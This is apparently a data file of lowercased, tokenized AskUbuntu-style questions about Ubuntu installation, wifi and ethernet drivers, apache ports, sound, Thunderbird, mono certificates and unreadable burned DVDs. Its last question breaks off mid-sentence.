331423	how can i install ubuntu on a windows xp machine that will not connect to the internet ?	i have a former windows 7 machine in which the hard drive failed . i bought a new hard drive and was forced to install windows 2000 and upgrade to xp- it would not allow straight xp install . i do not have access to a more recent windows os install . i ca n't get 2000 off the hard drive now but i also ca n't get xp to connect to the internet . i have heard great things about ubuntu and figured now is as good a time as any to give it a shot . how can i get ubuntu on the machine that wo n't connect to the internet ? i have a windows 7 laptop that is connected if i have to download onto a dvd-r if needed . please just tell me how . thanks !
331425	why does my ethernet connection fail after installation is complete ?	i am installing ubuntu for the first time on an old laptop ( inspiron 6400 ) and have run into an odd problem right off the bat . during installation , i am directed to connect the computer to the internet via ethernet cable . i do this , and have no problem establishing a connection . i get no warnings or error messages during the install process . once i am finished installing and log in , i suddenly can not access the network via ethernet . at all . i tried poking around in the wireless connections but i do n't have enough experience to recognize what might be a problem . i tried reinstalling the os and that did nothing . if anyone has any insight into this problem or even just some guidance on how to troubleshoot , then i would really appreciate the help .
331432	terminal emulator vs terminal	i am a having a little trouble understanding the difference between running the terminal emulator from the gui ( gnome ) and booting straight into the terminal . i have been a system/network administrator for a little over 10 years and i am very familiar with terminal emulation and how it works on a windows platform , however i was told by a linux `` engineer '' that running the terminal emulator from the gui ( as root ) would not grant the proper permissions to edit the kernel source code . he said you need to boot to the console and login as root .
331433	will downloading ubuntu erase windows ? and what will happen to my files ( pictures , documents etc . )	will installing ubuntu erase windows ? what will happen to my files ( pictures , documents etc . ) what will the installation do automatically ?
331441	sockets in ubuntu touch apps	i am creating an irc client for the ubuntu app showdown . i need a way to be able to access an irc server in qml ( or javascript ) . what is the best way to accomplish this ?
331446	which else commands does command passwd involve ?	have thought that command passwd uses for encryption of input the command mcrypt ? but instead it is crypt resp . encrypt ? source-code of crypt/encrypt is not available ? when am not confusing this - then in earlier times of linux passwd was using command mcrypt ? - who can enlighten me ? -thx . am asking this , because i want to pimp up my password-possibilities ... for those who are dizzled by this question : command passwd asks for input of your password , then in the background your password will be encrypted , after you finished your input . this encryption is settled by files of shadow . i was thinking in earlier days this encryption was settled by mcrypt ? now my question is , which else commands resp . files does command passwd involve too besides those of shadow ?
331447	gameranger interface not usable in wine 1.6	i recently moved from a windows 7 to ubuntu 12.04 , and i play warcraft iii a lot with my friends using gameranger . so i moved my wc3 to the wine disk and managed to install gameranger ( after a whole day fighting with winetricks for mfc42.dll ) . although some people report not being able to login , it worked perfectly for me . however , when the game and friends list shows up , i am not able to click on anything ( in fact , the windows even go out of focus ) . i can press alt to bring up the toolbar menus , but i cant navigate with keyboard nor mouse . any ideas how this can be fixed ?
331451	how do i run an application with arguments from the command line without losing the terminal ?	i use dwm as a window manager on ubuntu , i like tiled windows and i like them as few as possible . i sometimes need to run an application ( let 's say it 's the pdf viewer mupdf in x11 ) from the terminal , the application will be launched in a new window but the terminal from which i launched becomes this prompt-less console for that application to log whatever . i use dmenu to launch applications , but sometimes an application needs arguments ( file names ) to start . i use uxrvt within x11 managed by dwm .
331453	install problems at the `` expanding '' section	i have an hp pavilion dv6 notebook with an amd ae-35200m apu with radeon hd graphics 1.60 ghz . i has 8 gigs of ram and a 64-bit operating system . i have only one storage device and i already have windows 7 installed . i am attempting to run ubuntu on my computer without having to uninstall windows . the steps i took so far are as follows : i went to the official ubuntu downloader and burned an installation disk . i then ran the disk to begin installation . a prompt window came up asking for a name and password along with a few other things that i left at default . it began installing and made it to the part mentioned above and then stopped . everything goes well until the install got to the `` expanding '' section . it has been on this screen for five hours , and the progress bar has not moved . i have retried this twice with no success . so , can i assume something is wrong ? how can i fix this ?
331457	ca n't find or install canon mp230 on ubuntu 12.04	i have recently purchased a canon mp230 for college and i am trying to install it onto my computer which is running ubuntu 12.04 . i have checked the connections and it is switched on . i initially could n't find the printer in system settings . the only options given was uri and network printer . eventually , after installing updates , it found a printer connected through usb . when i searched the database , it did n't have the model of this printer . i tried searching for the ppd file but could n't find it on the installation disk . ( i 'm still new to ubuntu in some aspects ) . i tried typing the make and model in manually but it would n't search for the drivers . i downloaded the drivers from the canon europe website , both the debian 32 bit version and the rpm version . the rpm version would n't install at all and the debian i tried running through the software center . i tried to access the printer again through system settings and it will not find it as happened before the updates . i proceeded to install through the terminal but it could not find a connected printer . i have an art project due in 2 weeks and need the printer and scanner up and running asap .
331459	gtk+ themes not showing up	i downloaded some themes from gnome-look.org and i extracted and put them in /usr/share/themes folder and when i opened gnome-tweak-tool windows theme was working but gtk+ themes section was showing only the default ones . then i put the themes into ~/.themes folder but still no luck . how can i fix this ? for example , one of the themes is this one : http : //gnome-look.org/content/show.php/absolute ? content=126326
331465	ca n't connect to wireless macbook pro	i can not connect wireless on the macbook pro running linux . so linux is pretty much useless as my router is far away and in a spot that is annoying to work in , so , i need wireless . any help would greatly will be well accepted . i have a broadcom bcm4331 802.11a/b/g/n [ 14e4:4331 ] *************** info trace *************** ***** uname -a ***** linux jesus 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise ***** lspci ***** 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie [ 14e4:16b4 ] ( rev 10 ) subsystem : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie [ 14e4:16b4 ] kernel driver in use : tg3 kernel modules : tg3 02:00.1 sd host controller [ 0805 ] : broadcom corporation netxtreme bcm57765 memory card reader [ 14e4:16bc ] ( rev 10 ) subsystem : broadcom corporation device [ 14e4:0000 ] kernel driver in use : sdhci-pci -- 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) subsystem : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] kernel driver in use : bcma-pci-bridge ***** lsusb ***** bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 05ac:8509 apple , inc. facetime hd camera bus 002 device 003 : id 0424:2513 standard microsystems corp . bus 002 device 009 : id 05ac:821d apple , inc . bus 002 device 004 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 005 : id 05ac:8242 apple , inc. ir receiver [ built-in ] bus 002 device 006 : id 05ac:0252 apple , inc. internal keyboard/trackpad ( ansi ) ***** pcmcia card info ***** ***** iwconfig ***** ***** rfkill ***** 0 : hci0 : bluetooth soft blocked : no hard blocked : no ***** lsmod ***** b43 378855 0 mac80211 555198 1 b43 cfg80211 208382 2 b43 , mac80211 ssb 52834 1 b43 bcma 35762 1 b43 ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.6 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** auto lo iface lo inet loopback ***** iwlist ***** ***** resolv.conf ***** nameserver 127.0.0.1 ***** blacklist ***** [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac ***** modinfo ***** filename : /lib/modules/3.5.0-23-generic/kernel/drivers/net/wireless/b43/b43.ko firmware : b43/ucode9.fw firmware : b43/ucode5.fw firmware : b43/ucode16_mimo.fw firmware : b43/ucode15.fw firmware : b43/ucode14.fw firmware : b43/ucode13.fw firmware : b43/ucode11.fw license : gpl author : rafał miłecki author : gábor stefanik author : michael buesch author : stefano brivio author : martin langer description : broadcom b43 wireless driver srcversion : b17695451431a52a474624a alias : bcma : m04bfid0812rev1dcl* alias : bcma : m04bfid0812rev11cl* alias : ssb : v4243id0812rev10* alias : ssb : v4243id0812rev0f* alias : ssb : v4243id0812rev0d* alias : ssb : v4243id0812rev0c* alias : ssb : v4243id0812rev0b* alias : ssb : v4243id0812rev0a* alias : ssb : v4243id0812rev09* alias : ssb : v4243id0812rev07* alias : ssb : v4243id0812rev06* alias : ssb : v4243id0812rev05* depends : ssb , mac80211 , bcma , cfg80211 intree : y vermagic : 3.5.0-23-generic smp mod_unload modversions parm : bad_frames_preempt : enable ( 1 ) / disable ( 0 ) bad frames preemption ( int ) parm : fwpostfix : postfix for the .fw files to load . ( string ) parm : hwpctl : enable hardware-side power control ( default off ) ( int ) parm : nohwcrypt : disable hardware encryption . ( int ) parm : hwtkip : enable hardware tkip . ( int ) parm : qos : enable qos support ( default on ) ( int ) parm : btcoex : enable bluetooth coexistence ( default on ) ( int ) parm : verbose : log message verbosity : 0=error , 1=warn , 2=info ( default ) , 3=debug ( int ) parm : pio : use pio accesses by default : 0=dma , 1=pio ( int ) filename : /lib/modules/3.5.0-23-generic/kernel/drivers/ssb/ssb.ko license : gpl description : sonics silicon backplane driver srcversion : 657007c65032f6bdd9475ab alias : pci : v000014e4d0000432bsv*sd*bc*sc*i* alias : pci : v000014e4d00004329sv*sd*bc*sc*i* alias : pci : v000014e4d00004328sv*sd*bc*sc*i* alias : pci : v000014e4d00004325sv*sd*bc*sc*i* alias : pci : v000014e4d00004324sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d6sv*sd*bc*sc*i* alias : pci : v000014e4d00004322sv*sd*bc*sc*i* alias : pci : v000014e4d00004321sv*sd*bc*sc*i* alias : pci : v000014e4d00004320sv*sd*bc*sc*i* alias : pci : v000014e4d00004319sv*sd*bc*sc*i* alias : pci : v000014a4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004315sv*sd*bc*sc*i* alias : pci : v000014e4d00004312sv*sd*bc*sc*i* alias : pci : v000014e4d00004311sv*sd*bc*sc*i* alias : pci : v000014e4d00004307sv*sd*bc*sc*i* alias : pci : v000014e4d00004306sv*sd*bc*sc*i* alias : pci : v000014e4d00004301sv*sd*bc*sc*i* depends : intree : y vermagic : 3.5.0-23-generic smp mod_unload modversions filename : /lib/modules/3.5.0-23-generic/kernel/drivers/bcma/bcma.ko license : gpl description : broadcom 's specific amba driver srcversion : 2c92ccb735c6654cb7e788b alias : pci : v000014e4d00004727sv*sd*bc*sc*i* alias : pci : v000014e4d00004357sv*sd*bc*sc*i* alias : pci : v000014e4d00004353sv*sd*bc*sc*i* alias : pci : v000014e4d00004331sv*sd*bc*sc*i* alias : pci : v000014e4d00000576sv*sd*bc*sc*i* depends : intree : y vermagic : 3.5.0-23-generic smp mod_unload modversions ***** udev rules ***** # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0 ( tg3 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' ***** dmesg ***** [ 8.354410 ] bcma-pci-bridge 0000:03:00.0 : enabling device ( 0000 - > 0002 ) [ 8.354448 ] bcma : found chip with id 0x4331 , rev 0x02 and package 0x09 [ 8.354477 ] bcma : core 0 found : chipcommon ( manuf 0x4bf , id 0x800 , rev 0x25 , class 0x0 ) [ 8.354502 ] bcma : core 1 found : ieee 802.11 ( manuf 0x4bf , id 0x812 , rev 0x1d , class 0x0 ) [ 8.354559 ] bcma : core 2 found : pcie ( manuf 0x4bf , id 0x820 , rev 0x13 , class 0x0 ) [ 8.418258 ] bcma : bus registered [ 9.560627 ] b43-phy0 : broadcom 4331 wlan found ( core revision 29 ) [ 9.562873 ] b43-phy0 error : firmware file `` b43/ucode29_mimo.fw '' not found [ 9.562875 ] b43-phy0 error : firmware file `` b43-open/ucode29_mimo.fw '' not found [ 9.562876 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . ****************** done ******************
331468	how to setup two virtual machines to connect via openssh ?	i have host computer mac running two ubuntu as guest machines . i would like to set up ssh connection between these two virtual machines . both guest machines are equipped with open-ssh server/client . been googling to try to figure out , but to no avail , failed . i have given both guests machines `` bridge mode '' so they all have different ip address . have internet connections . but when tried ssh x.x.x.x , it says connection is refused . my understanding is that this can occur due to firewall ? is there way to solve this ? ? is it even possible to accomplish ssh between two guest machines ? ? i do n't see why not ? if someone can shed some light for me.. that would be most appreciated .
331469	i need to be able to save my data on my ubuntu on usb	i run ubuntu on a usb , but it does n't save my data . is there a way to save my data ?
331473	security updates for the universe repository for lts releases ?	what happens if there is a security problem in a package in the universe repository four years after the 12.04 lts release ; will the package be updated from upstream , patched , or left alone ? it 's my understanding that the `` 5 years of support & security updates '' applies only to the core of ubuntu -- anything in main repository . not for things in the universe repository . for a more specific example -- if i install ruby now , and want to use it for the next several years on 12.04 and it has a security vulnerability ; while this might be patched in the upstream ( so i could always download the latest from their website and compile it myself or use a ppa ) , will this upstream fix be migrated into the precise package repositories ? what about backports ?
331482	how to disable alt+tab preview windows in cinnamon ?	how do i disable alt+tab preview windows in cinnamon ? see this the screenshot , to see what i mean .
331483	which ubuntu version should i install in a macbook mid 2009 , is going up to the latest version okay ?	i have a macbook mid 2009 and i wish to install ubuntu in it , just want to make sure which version is good to go in it .
331497	hp pavilion 15-e043cl amd - wifi not working	just got a hp pavilion 15-e043cl from costco for my kids . the laptop is supposedly preloaded/running windows 8 . i did not even try to load windows . i right away loaded ubuntu 13.04 from a live cd ( no harddrive installation yet ) . i just want to see how ubuntu would perform before installing it . i was able to get the laptop on the network using a cat5 cable using eth0 . so the laptop can see the network/internet using a wired connection . however , i do n't seem to be able to get the wifi to work . the wifi button ( near the f12 button/wifi antenna ) is orange ( supposedly working ) but it seems that the base installation might not have the proper drivers . i 'm far from being a linux guru so please point me to the proper direction . maybe the drivers are not available for 13.04 ? should i try 12.10 ? thanks t
331499	xorg/compiz is using massive amounts of cpu . what to do ?	i am using ubuntu 12.04 . i 've been trying to figure out what is causing my xorg and compiz to frequently come close to maxing out my cpu usage for weeks now . essentially , during normal use , both processes will fluctuate between using next to no cpu to all of my cpu . i did a little research and it might be a memory leak , but i 'm not entirely sure . does anyone know what could be causing this issue , and how i could go about fixing it ? i 'm using an ati mobility radeon 5400 . $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] $ glxinfo | grep render direct rendering : yes opengl renderer string : gallium 0.4 on amd rs880 gl_nv_conditional_render , gl_amd_conservative_depth , contents of /var/log/xorg.0.log - http : //pastebin.com/684enket
331500	is the nginx charm stable for production ?	i 'll like to use the nginx charm in production and will like to know if it 's stable and ready enough for production . yes , i 'm talking about specific juju charm for nginx . i 'm talking about this : http : //manage.jujucharms.com/~imbrandon/precise/nginx
331501	awful sound quality in razer megalodon	i have a razer megalodon usb headset that is producing extremely crackly sound in ubuntu 13.04 . i 've generated an alsainfo file to try to find out what the problem is , and it seems it 's only recognizing one `` pcm '' channel . this is shown in alsamixer as well . the alsainfo.txt file with most of the info i can get is here : https : //dl.dropboxusercontent.com/u/48007253/alsa-info.txt . the info given by lsusb -v is provided here ( it gets important at line 990 ) : https : //dl.dropboxusercontent.com/u/48007253/lsusb.txt the output of for i in $ ( find /proc/asound/ ) ; do echo $ i : ; cat $ i ; echo ; done , for those who are curious , is provided here : https : //dl.dropboxusercontent.com/u/48007253/asound.txt the output of pacmd list is provided here : https : //dl.dropboxusercontent.com/u/48007253/pacmdlist.txt i 've confirmed the problem is not apparent in windows 8.1 , and it works with plug-and-play functionality . if i mess with the channel settings in the ubuntu sound settings menu , i can occasionally get it working , but i ca n't get it to stay through reboots ( or reconfiguring the sound menu again ) , and it definitely does n't have the 7.1 surround sound . whether i use aplay or mplayer to test known good sound files , it does n't produce discernible sound . selecting any of the speakers in the ubuntu sound settings menu does not produce any output . one thing to note is that the sound is not pure static . if i listen carefully , i can pick out occasional discernible syllables while running mplayer still\ alive.mp3 . hopefully someone with some usb-audio/alsa/pulseaudio knowledge can help here . ( as a side note , it turns out it 's a bad idea to install oss4 on an ubuntu system . fortunately , i 've got my sound back up and running again , now . it still did n't fix anything with the headset . )
331502	live usb ubuntu can only boot when deleting casper file	i installed the ubuntu 12.04 into my flash drive to create a bootable usb stick . the first time boot is smooth with no issue . but after played around with it and rebooted it , the ubuntu could not get start . i tried both pendrivelinux and universal-usb-installer to create the bootable usb . they both have the same issue , but giving two different errors . the previous one stops with `` kernel.thread helper '' error . the later one ends up with a shell command environment , but ca n't boot ubuntu . my flash drive is 4 gb , and i reserved 2gb room for the persistence . so i can see a 2gb casper file in the flash drive . after i delete this file , i can boot the ubuntu system again . so i guess it might be some issue with loading the persistent data . any thought about how to fix this issue ? thank you very much !
331504	thunderbird wo n't start	restarted my computer , and noticed that thunderbird which is set to auto-start did not start . so i clicked on the icon on the taskbar , the box highlighted the icon , the cursor spun around for a minute and then just quit . i tried clicking the icon on my cairo dock , and going into the start programs folder and clicking there , same thing . i tried to start it with a terminal command and got this error : ( process:3354 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed i tried reinstalling with synaptic , still no luck . i do n't want to uninstall and lose all my settings unless i just have to . so does anyone have any other ideas , before i uninstall ? edit new info ; ardvark , i did post on both boards because i do n't know if its a tb problem , or a ubuntu problem . now the response i got over there lead me to open system monitor and i found that tb was still running in the processes , so i ended the process , still would not start , then had to do a gksudo nautilus , and delete a lock , and parentlock file inside the tb folder . tried to start the tb -profilemanager , error said file did not exist . uninstalled and reinstalled tried to start nothing , tried to start with terminal and got the error ( process:3637 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed then i noticed that i am still getting my new email msg popups . so it 's running somewhere . vfbsilva first that was the whole error msg ( on both of them ) . i tried to start with the command `` sudo thunderbird '' error was ( process:4261 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed ( thunderbird:4261 ) : ibus-warning ** : the owner of /home/robby/.config/ibus/bus is not root ! 07:32:15 info firetray.handler os=linux , abi=x86_64-gcc3 , xulrunner=17.0.8 07:32:15 info firetray.handler inmailapp=true , inbrowserapp=false , apphaschat=true 07:32:15 info firetray.handler ischatprovided=true the link you gave me was for ff , and i was unsure how to change the chown command to point to tb . everyone thanks for the responses .
331506	how to make changes of config under /etc folder to take effect ?	i 'm a rookie in ubuntu and recently trying to learn ubuntu . now i encountered a very serious issue that for some reasons i need to update the configuration file like httpd.conf , hosts.deny and others and in order to make these changes to take effect , every time i rebooted the ubutn server machine which is totally not allowed and produces serious impacts . i know ubuntu has many kinds of configuation files , including ones from system itself , or user 's applications , etc , so the questions i 'm intending to ask are : 1 , can anybody summarize a list of types of configuation files in ubuntu ? 2 , what 's the convenient way for making these changes to take effect without rebooting the machine ? thanks in advance .
331508	buttonmapping - positional parameters	in an x configuration file mouse buttons can be mapped using a buttonmapping option : section `` inputclass '' # ... option `` buttonmapping '' `` 1 9 3 4 5 6 7 8 2 '' # ... endsection changing the order of the numbers changes the behaviour of the mouse buttons . yet i can not find any documentation that describes how the behaviour is assigned . what little documentation there is , i helped write . for example , if the button mapping was written thus : option `` buttonmapping '' `` a b c d e f g h i '' we would document these positions as : a - left click b - middle c - right click d - scroll forward e - scroll backward f - forward g - backward h - horizontal scroll i - vertical scroll my question then : what do the positional values of a through i actually represent and how are they mapped to mouse buttons ?
331513	internet wo n't work wired or wifi - ubuntu 12.04	last week i installed ubuntu 12.04 on my dell inspiron 1520 . it used to have windows , but it crashed and i did n't want to pay for windows again so i am trying to figure out linux . after logging in , i am unable to connect to the internet at all . when the ethernet cable is plugged in , i can not connect to the internet . in the system settings - > network , there are no wired or wireless options listed for me to connect to . other machines in my house can connect directly to the lan and wireless so i know the internet is working . i have tried restarting the machine with the wifi switch in the on and off positions . when i ran sudo ifconfig i get : link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) when i ran sudo iwconfig i get : no wireless extensions . then i installed linux-firmware-nonfree_1.1ubuntu2_all.deb , the non-free firmware for linux kernel drivers and i am still unable to get online . now the results of sudo ifconfig while the computer is wired are slightly different : link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:944 ( 944.0 b ) tx bytes:944 ( 944.0 b ) what else can i do to get the internet to work on my computer ?
331515	`` language support '' icon missing in system settings	the `` language support '' icon from the system settings has disappeared : ( also i ca n't find it from dash ) the last thing i 've done was changing the keyboard input method system to `` ibus '' . i tried to execute gnome-control-center directly in the command line , expecting to see errors in the output , but there is no console output . where can i start looking for the cause ? can i call the `` language support '' option directly from command line ?
331519	mozroots command fails with unsupported hash error	i am using the following set of command on a new install of 12.04 lts . sudo apt-get install -qq python-software-properties sudo add-apt-repository -y ppa : v-kukol/mono-testing sudo apt-get update -qq > /dev/null sudo apt-get install -qq mono-complete mono-gmcs > /dev/null mozroots -- import -- sync the mozroots command fails , though , with the following error message . mozilla roots importer - version 3.0.12.0 download and import trusted root certificates from mozilla 's mxr . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . downloading from 'http : //mxr.mozilla.org/seamonkey/source/security/nss/lib/ckfw/builtins/certdata.txt ? raw=1 ' ... importing certificates into user store ... error : system.security.cryptography.cryptographicexception : unsupported hash algorithm : 1.2.840.10045.4.3.3 at mono.security.cryptography.pkcs1.hashnamefromoid ( system.string oid ) [ 0x00000 ] in < filename unknown > :0 at mono.security.cryptography.pkcs1.createfromoid ( system.string oid ) [ 0x00000 ] in < filename unknown > :0 at mono.security.x509.x509certificate.get_hash ( ) [ 0x00000 ] in < filename unknown > :0 at mono.security.x509.x509certificatecollection.indexof ( mono.security.x509.x509certificate value ) [ 0x00000 ] in < filename unknown > :0 at mono.security.x509.x509certificatecollection.contains ( mono.security.x509.x509certificate value ) [ 0x00000 ] in < filename unknown > :0 at mono.tools.mozroots.process ( ) [ 0x00000 ] in < filename unknown > :0 at mono.tools.mozroots.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 i did not have this issue when i used mono 2.10.8.1 ( default version for 12.04 ) . however , i need some of the newer features of mono for my application now . how can i solve this error ?
331520	uninstalling ubuntu 12.04.2 or expanding its partition	i currently have ubuntu dual-booted on my windows 7 laptop . i installed ubuntu 12.04.2 via the windows installer and i only allocated 18gb for its partition . i still want to use ubuntu but i want it on a larger partition so i would like to either delete the partition it 's currently using and reinstall ubuntu with a larger partition ( around 100gb or so ) . or if there 's a way i can actually expand the partition it 's on that would be great since i would n't have to start all over again .
331522	ca n't successfully change port that apache2 listens for	i am trying to change the port that apache listens to from '80 ' to '8085 ' ( or any other number ) . i modified /etc/apache2/ports.conf : namevirtualhost *:8085 listen 8085 and i also modified /etc/apache2/sites-enabled/000-default : < virtualhost *:8085 > serveradmin webmaster @ localhost the last thing i did was port forwarding on my router . i used to use '80 ' so i just changed that to '8085 ' . alas , i am unable to reach my apache homepage ( the one that says it works ! and i am not sure why . i feel like i have hit all the things that need to be changed . any tips ? also , when i do netstat -tulpn | grep :8085 i get : tcp6 0 0 : ::8085 : : : * listen 4232/apache2 the port is in red , is it firewalled ? i have reloaded and restarted apache and the server . thank you in advance edit output of iptables -l chain input ( policy accept ) target prot opt source destination fail2ban-apache tcp -- anywhere anywhere multiport dports http , https fail2ban-ssh tcp -- anywhere anywhere multiport dports 239 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain fail2ban-apache ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere hopefully you can get something out of that . additionally , i do not recall what i seen before i made the changes . i am not sure but i think i should be listening for ipv4 . literally the only things i have changed are what is noted above .
331524	why will burned video dvds not mount and why are those dvd 's wrongly seen as empty in 13.04 ?	this happens with all self-made dvd 's i have . created those quite some time ago on windows xp with nero . my dvd player autostarts the dvds . windows 7 also plays/sees the files on the dvds commercial dvds open normally , just as self-made data dvds ( old ones made with gnomebaker ) , as do audio cds and data cds . later i created these simple dvds on vista with nero and later with nero for linux ; probably ubuntu 10 ( i think ) . a few ( illegal movies ) and most dvds are music bootlegs . the dvds are named and have two folders that 's all : [ empty ] audio_ts and [ containing files in ] video_ts . might this be an udf issue ? and should as i saw somewhere /etc/fstab be edited to include udf specifically ? installed and reinstalled : libudf0 , libudf-dev and udftools among other things . manually mounting gives the following : sudo mount -t udf /dev/sr0 /media/joost output : mount : blok-apparaat /dev/sr0 is schrijfbeveiligd en wordt als alleen-lezen aangekoppeld mount : onjuiste bestandssysteemsoort , ongeldige optie , ontbrekende codepagina , ontbrekend hulpprogramma , slecht superblok op /dev/sr0 , of een andere fout soms staat er nuttige informatie in het systeemlog -- probeer zoiets als : dmesg | tail ( quick translation from the dutch : block device /dev/sr0 is write protected will be mounted as read only . mount : invalid/wrong filesystem , invalid option , missing code page , missing help program , bad superblock /dev/sr0 or other error ... sometimes more info dmesg | tail : joost @ joost-hp-compaq-nc6320 : ~ $ dmesg | tail [ 6596.943015 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 [ 6596.943019 ] udf-fs : warning ( device sr0 ) : udf_load_vrs : no anchor found [ 6596.943023 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no partition found ( 1 ) [ 6807.503797 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=256 , location=256 [ 6808.545327 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 [ 6808.545360 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=512 , location=512 [ 6808.545366 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 [ 6808.545371 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 [ 6808.545375 ] udf-fs : warning ( device sr0 ) : udf_load_vrs : no anchor found [ 6808.545379 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no partition found ( 1 ) . because data dvds and commercial dvds are opening normally i 'm at a loss . also when i insert a burned video dvd all the time ubuntu gives the message : can not mount blank dvd+rw disc location already mounted . i can see the dvd now in nautilus ; i can drag files to it to be burned on it . of course that 's not possible ; if i add a file and click on burn to disk , ubuntu states that there is insufficient free space on the dvd . all burned dvds are finalized . with mplayer , vlc and totem i tried to access the files on several dvds , but i had no luck . in synaptic i found dvdisaster and tried it . and dvdisaster was the only program that detected something on the two dvds i tried . it gave the name/title and was scanning , but that took too long and burned video play in standalone dvdplayer and windows . does dvdisaster use special libraries ? i tried opening a dvd from the terminal : joost @ joost-hp-compaq-nc6320 : ~ $ mplayer dvd : // mplayer2 unknown ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing dvd : // . libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdread : ca n't seek to block 256 libdvdnav : dvdopenfileudf : udffindfile /video_ts/video_ts.ifo failed libdvdread : ca n't seek to block 256 libdvdnav : dvdopenfileudf : udffindfile /video_ts/video_ts.bup failed libdvdread : ca n't open file video_ts.bu . ca n't open vmg info ! no stream found to handle url dvd : // exiting ... ( end of file ) [ totem in terminal also does n't work . ] i reinstalled restricted extras and codecs ( reinstalled these : ibdvdcss2 libdvdread4 libdvdcss-dev ) , with sudo /usr/share/doc/libdvdread4/./install-css.sh and rebooting but to no avail . i also tried several of the tips here but no luck . my regionset output : current region code settings : rpc phase : ii type : none vendor resets available : 4 user controlled changes resets available : 5 drive plays discs from region ( s ) : , mask=0xff [ do not see a number , but commercial dvds play normally . ] is there something that nero `` does '' while burning ? i do not think so , because only playback issues with ubuntu ( 13.04 ) . some region-free encryption or something which nero ( also ) burned which is n't standard ? i 'm thinking udf support in 13.04 , current kernel ? but i have n't got a clue . these errors are from the system log : [ 8969.688339 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=256 , location=256 aug 12 06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729916 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 aug 12 